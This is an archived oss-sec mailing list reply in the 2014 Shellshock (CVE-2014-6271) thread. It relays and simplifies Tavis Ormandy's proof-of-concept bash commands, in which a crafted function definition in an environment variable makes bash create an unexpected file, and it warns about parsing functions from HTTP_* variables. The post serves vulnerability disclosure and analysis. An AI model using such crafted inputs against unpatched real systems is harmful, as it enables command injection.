oss-sec mailing list archives
Re: CVE-2014-6271: remote code execution through bash
From: Michal Zalewski <lcamtuf () coredump cx>
Date: Wed, 24 Sep 2014 15:37:03 -0700
Tavis Ormandy just tweetet this: https://twitter.com/taviso/status/514887394294652929
$ env X='() { (a)=>\' sh -c "echo date"; cat echo
This can be simplified as:
$ X='() { function a a>\' bash -c echo
$ ls echo
echo
And the core parsing problem is illustrated by this:
$ function a a>\ [RETURN]
foo
$ whatever $ ls whatever Tavis and I spent a fair amount of time trying to figure out if this poses a more immediate risk, but so far, no dice. It strongly suggests that the parser is fragile and that there may be unexpected side effects, though; parsing functions seen in HTTP_* and such seems like a very risky proposition. /mz
Current thread:
- Re: CVE-2014-6271: remote code execution through bash, (continued)
- Re: CVE-2014-6271: remote code execution through bash Chet Ramey (Sep 25)
- Re: CVE-2014-6271: remote code execution through bash Simon McVittie (Sep 26)
- Re: CVE-2014-6271: remote code execution through bash Solar Designer (Sep 25)
- Message not available
- Re: CVE-2014-6271: remote code execution through bash Chet Ramey (Sep 25)
- Re: CVE-2014-6271: remote code execution through bash Alexandre Dulaunoy (Sep 25)
- Re: CVE-2014-6271: remote code execution through bash Larry W. Cashdollar (Sep 25)
- Re: CVE-2014-6271: remote code execution through bash Chet Ramey (Sep 25)
- Re: CVE-2014-6271: remote code execution through bash Dwayne Litzenberger (Sep 26)
- Re: CVE-2014-6271: remote code execution through bash Solar Designer (Sep 26)
- Re: CVE-2014-6271: remote code execution through bash Chet Ramey (Sep 26)